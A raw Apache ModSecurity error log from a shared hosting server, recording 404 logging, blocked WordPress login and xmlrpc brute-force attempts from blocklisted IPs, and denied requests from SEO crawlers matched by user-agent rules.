[Tue May 26 17:32:09.519138 2026] [security2:error] [pid 891273:tid 891479] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLwcDEzZ8z3jtDm82mzQAAAEw"]
[Tue May 26 17:32:10.186403 2026] [security2:error] [pid 891273:tid 891473] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLwcDEzZ8z3jtDm82m7wAAAEY"]
[Tue May 26 17:32:10.280348 2026] [security2:error] [pid 891273:tid 891435] [client 139.180.231.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLwsDEzZ8z3jtDm82m-gAAACA"], referer: https://www.anujtradingco.com/
[Tue May 26 17:32:11.633027 2026] [security2:error] [pid 894579:tid 894824] [client 139.180.231.216:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLwwEtZWuWWBGzl__P9wAAAXs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460776&moderation-hash=f87ca7c20be215fb4001200ec4597058
[Tue May 26 17:32:12.320230 2026] [security2:error] [pid 894579:tid 894732] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLwwEtZWuWWBGzl__QCgAAASA"]
[Tue May 26 17:32:12.484063 2026] [autoindex:error] [pid 891273:tid 891458] [client 124.156.200.4:0] AH01276: Cannot serve directory /home1/moesartc/public_html/vishaal-shah.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:32:13.045616 2026] [security2:error] [pid 894579:tid 894720] [client 46.225.55.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLxAEtZWuWWBGzl__QLAAAARQ"]
[Tue May 26 17:32:13.826345 2026] [security2:error] [pid 894579:tid 894730] [client 223.235.98.214:30807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLxQEtZWuWWBGzl__QWgAAAR4"]
[Tue May 26 17:32:13.826514 2026] [security2:error] [pid 894579:tid 894730] [client 223.235.98.214:30807] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLxQEtZWuWWBGzl__QWgAAAR4"]
[Tue May 26 17:32:14.288790 2026] [security2:error] [pid 891273:tid 891530] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLxcDEzZ8z3jtDm82nNQAAAH8"]
[Tue May 26 17:32:14.795443 2026] [security2:error] [pid 894579:tid 894826] [client 104.210.140.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWLxQEtZWuWWBGzl__QVAAAAX0"]
[Tue May 26 17:32:16.826483 2026] [security2:error] [pid 894579:tid 894744] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLyAEtZWuWWBGzl__QvgAAASw"]
[Tue May 26 17:32:17.585542 2026] [security2:error] [pid 894579:tid 894746] [client 99.66.19.186:63014] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWLyQEtZWuWWBGzl__Q8AABLj8"]
[Tue May 26 17:32:17.590932 2026] [security2:error] [pid 894579:tid 894721] [client 99.66.19.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWLyQEtZWuWWBGzl__Q9QAAARU"]
[Tue May 26 17:32:17.596677 2026] [security2:error] [pid 894579:tid 894746] [client 99.66.19.186:63014] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "poonawallatennisacademy.com"] [uri "/index.php"] [unique_id "ahWLyQEtZWuWWBGzl__Q8QABLjw"]
[Tue May 26 17:32:17.927819 2026] [security2:error] [pid 891273:tid 891375] [remote 94.76.235.103:57356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWLycDEzZ8z3jtDm82negAAG2U"]
[Tue May 26 17:32:18.529605 2026] [security2:error] [pid 894579:tid 894767] [client 108.165.49.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahWLyQEtZWuWWBGzl__Q-wAAAUM"]
[Tue May 26 17:32:18.707881 2026] [security2:error] [pid 894579:tid 894788] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLygEtZWuWWBGzl__RAAAAAVc"]
[Tue May 26 17:32:21.477900 2026] [security2:error] [pid 894579:tid 894637] [remote 111.229.10.83:37790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.10.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahWLzQEtZWuWWBGzl__RHQABQTk"]
[Tue May 26 17:32:21.524747 2026] [security2:error] [pid 891273:tid 891441] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLzcDEzZ8z3jtDm82npQAAACY"]
[Tue May 26 17:32:22.652211 2026] [security2:error] [pid 894579:tid 894695] [remote 142.44.228.41:30828] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "adityacreations.co.in"] [uri "/robots.txt"] [unique_id "ahWLzgEtZWuWWBGzl__ROQABQHM"]
[Tue May 26 17:32:22.652426 2026] [security2:error] [pid 894579:tid 894764] [client 142.44.228.41:30828] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "adityacreations.co.in"] [uri "/robots.txt"] [unique_id "ahWLzgEtZWuWWBGzl__ROQABQHM"]
[Tue May 26 17:32:22.895752 2026] [security2:error] [pid 894579:tid 894713] [client 74.7.175.159:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.friendsalongtheway.net.thedebateafrica.org"] [uri "/index.php"] [unique_id "ahWLzgEtZWuWWBGzl__RKgAAAQ0"]
[Tue May 26 17:32:22.896523 2026] [security2:error] [pid 894579:tid 894721] [client 74.7.175.159:51534] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.friendsalongtheway.net.thedebateafrica.org"] [uri "/robots.txt"] [unique_id "ahWLzgEtZWuWWBGzl__RKAABFXU"]
[Tue May 26 17:32:23.027927 2026] [security2:error] [pid 894579:tid 894833] [client 74.7.230.57:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWLzgEtZWuWWBGzl__RMQAAAYQ"]
[Tue May 26 17:32:23.027952 2026] [security2:error] [pid 894579:tid 894833] [client 74.7.230.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWLzgEtZWuWWBGzl__RMQAAAYQ"]
[Tue May 26 17:32:23.056133 2026] [security2:error] [pid 894579:tid 894726] [client 74.7.230.57:40612] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.friendsalongtheway.net"] [uri "/robots.txt"] [unique_id "ahWLzgEtZWuWWBGzl__RMAABGnY"]
[Tue May 26 17:32:23.524750 2026] [security2:error] [pid 894579:tid 894769] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLzwEtZWuWWBGzl__RQwAAAUQ"]
[Tue May 26 17:32:24.114619 2026] [security2:error] [pid 894579:tid 894660] [remote 51.161.37.180:16018] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "adityacreations.co.in"] [uri "/"] [unique_id "ahWL0AEtZWuWWBGzl__RYAABP1A"]
[Tue May 26 17:32:24.114873 2026] [security2:error] [pid 894579:tid 894763] [client 51.161.37.180:16018] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "adityacreations.co.in"] [uri "/"] [unique_id "ahWL0AEtZWuWWBGzl__RYAABP1A"]
[Tue May 26 17:32:24.346480 2026] [security2:error] [pid 894579:tid 894828] [client 74.7.230.57:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWLzwEtZWuWWBGzl__RSAAAAX8"], referer: https://www.friendsalongtheway.net/robots.txt
[Tue May 26 17:32:24.347574 2026] [security2:error] [pid 894579:tid 894809] [client 74.7.230.57:40624] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "friendsalongtheway.net"] [uri "/robots.txt"] [unique_id "ahWLzwEtZWuWWBGzl__RRgABbFE"], referer: https://www.friendsalongtheway.net/robots.txt
[Tue May 26 17:32:24.592730 2026] [security2:error] [pid 894579:tid 894738] [client 185.191.171.16:44906] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/new-years/list/"] [unique_id "ahWL0AEtZWuWWBGzl__RaQAAASY"]
[Tue May 26 17:32:24.592911 2026] [security2:error] [pid 894579:tid 894738] [client 185.191.171.16:44906] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/new-years/list/"] [unique_id "ahWL0AEtZWuWWBGzl__RaQAAASY"]
[Tue May 26 17:32:24.674720 2026] [security2:error] [pid 894579:tid 894825] [client 223.235.98.214:18468] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL0AEtZWuWWBGzl__RawAAAXw"]
[Tue May 26 17:32:24.674869 2026] [security2:error] [pid 894579:tid 894825] [client 223.235.98.214:18468] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL0AEtZWuWWBGzl__RawAAAXw"]
[Tue May 26 17:32:24.791035 2026] [security2:error] [pid 894579:tid 894717] [client 139.180.231.216:32163] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWL0AEtZWuWWBGzl__RYwAAARE"], referer: https://anujtradingco.com
[Tue May 26 17:32:25.590880 2026] [security2:error] [pid 894579:tid 894662] [remote 103.91.67.202:13778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWL0QEtZWuWWBGzl__RfwABglI"]
[Tue May 26 17:32:25.746992 2026] [security2:error] [pid 894579:tid 894686] [remote 14.161.17.36:55894] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWL0QEtZWuWWBGzl__RgwABSGo"]
[Tue May 26 17:32:26.252761 2026] [security2:error] [pid 891273:tid 891480] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL0cDEzZ8z3jtDm82nxwAAAE0"]
[Tue May 26 17:32:26.312138 2026] [security2:error] [pid 891273:tid 891472] [client 114.119.129.92:57371] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahWL0sDEzZ8z3jtDm82n1QAAAEU"], referer: http://haddingtonwines.com/cart?remove_item=080c993fb3b58e26c1d2265bf9da0af3
[Tue May 26 17:32:28.722079 2026] [security2:error] [pid 894579:tid 894806] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL1AEtZWuWWBGzl__RmgAAAWk"]
[Tue May 26 17:32:29.771854 2026] [security2:error] [pid 891273:tid 891308] [remote 49.12.3.147:32822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWL1cDEzZ8z3jtDm82oDQAADyI"]
[Tue May 26 17:32:30.988344 2026] [security2:error] [pid 891273:tid 891503] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL1sDEzZ8z3jtDm82oGwAAAGQ"]
[Tue May 26 17:32:33.230530 2026] [security2:error] [pid 894579:tid 894761] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL2AEtZWuWWBGzl__RzgAAAT0"]
[Tue May 26 17:32:34.768731 2026] [security2:error] [pid 891273:tid 891436] [client 223.235.98.214:4132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL2sDEzZ8z3jtDm82oSgAAACE"]
[Tue May 26 17:32:34.768915 2026] [security2:error] [pid 891273:tid 891436] [client 223.235.98.214:4132] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL2sDEzZ8z3jtDm82oSgAAACE"]
[Tue May 26 17:32:35.102463 2026] [security2:error] [pid 891273:tid 891403] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL2sDEzZ8z3jtDm82oSQAAAAA"]
[Tue May 26 17:32:35.975113 2026] [security2:error] [pid 894579:tid 894700] [remote 45.32.67.165:46826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWL2wEtZWuWWBGzl__R8wABh3g"]
[Tue May 26 17:32:38.012012 2026] [security2:error] [pid 894579:tid 894776] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL3QEtZWuWWBGzl__SEwAAAUs"]
[Tue May 26 17:32:38.450554 2026] [security2:error] [pid 894579:tid 894779] [client 47.128.46.98:26962] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/k2/user/content/178-budget-transparency"] [unique_id "ahWL3gEtZWuWWBGzl__SIAAAAU4"]
[Tue May 26 17:32:39.784044 2026] [security2:error] [pid 894579:tid 894728] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL3wEtZWuWWBGzl__SMgAAARw"]
[Tue May 26 17:32:42.496005 2026] [security2:error] [pid 894579:tid 894735] [client 114.119.137.184:43851] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/what-we-believe-in"] [unique_id "ahWL4gEtZWuWWBGzl__ShQAAASM"], referer: http://rohiniventures.com/pages/
[Tue May 26 17:32:42.515710 2026] [security2:error] [pid 894579:tid 894726] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL4gEtZWuWWBGzl__SbQAAARo"]
[Tue May 26 17:32:44.477384 2026] [security2:error] [pid 891273:tid 891425] [client 14.191.246.130:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL5MDEzZ8z3jtDm82o1wAAABY"]
[Tue May 26 17:32:45.266950 2026] [security2:error] [pid 891273:tid 891496] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL5MDEzZ8z3jtDm82o7AAAAF0"]
[Tue May 26 17:32:45.294508 2026] [security2:error] [pid 891273:tid 891410] [client 223.235.98.214:2897] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL5cDEzZ8z3jtDm82o_wAAAAc"]
[Tue May 26 17:32:45.294817 2026] [security2:error] [pid 891273:tid 891410] [client 223.235.98.214:2897] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL5cDEzZ8z3jtDm82o_wAAAAc"]
[Tue May 26 17:32:45.696745 2026] [security2:error] [pid 894579:tid 894587] [remote 123.30.233.13:50320] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWL5QEtZWuWWBGzl__S2gABKwc"]
[Tue May 26 17:32:46.765572 2026] [security2:error] [pid 891273:tid 891426] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL5sDEzZ8z3jtDm82pIgAAABc"]
[Tue May 26 17:32:48.725676 2026] [security2:error] [pid 894579:tid 894754] [client 45.132.115.73:26523] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "ivwellnessresources.org"] [uri "/wp-login.php"] [unique_id "ahWL6AEtZWuWWBGzl__TJgAAATY"]
[Tue May 26 17:32:48.987007 2026] [security2:error] [pid 894579:tid 894783] [client 64.188.91.103:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWL6AEtZWuWWBGzl__TPAAAAVI"]
